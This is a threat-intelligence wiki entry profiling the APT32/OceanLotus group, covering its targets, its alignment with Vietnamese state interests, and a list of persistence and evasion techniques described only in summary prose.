Group: APT32, OceanLotus Group

From enterprise
Jump to: navigation, search
APT32, OceanLotus Group
ID G0050
Aliases APT32, OceanLotus Group

APT32 is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as with foreign governments, dissidents, and journalists. The group's operations are aligned with Vietnamese state interests.1

Alias Descriptions

  • APT32 - 1
  • OceanLotus Group - 1

Techniques Used

  • Scheduled Task - APT32 has used scheduled tasks to persist on victim systems.1
  • Regsvr32 - APT32 created a Scheduled Task that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory.1
  • PowerShell - APT32 has used PowerShell-based tools and shellcode loaders for execution.1
  • Timestomp - APT32 has used scheduled task raw XML with a backdated timestamp of June 2, 2016.1
  • Masquerading - APT32 has used hidden or non-printing characters to help masquerade file names on a system, such as appending a Unicode no-break space character to a legitimate service name.1
  • Valid Accounts - APT32 has used legitimate local admin account credentials.1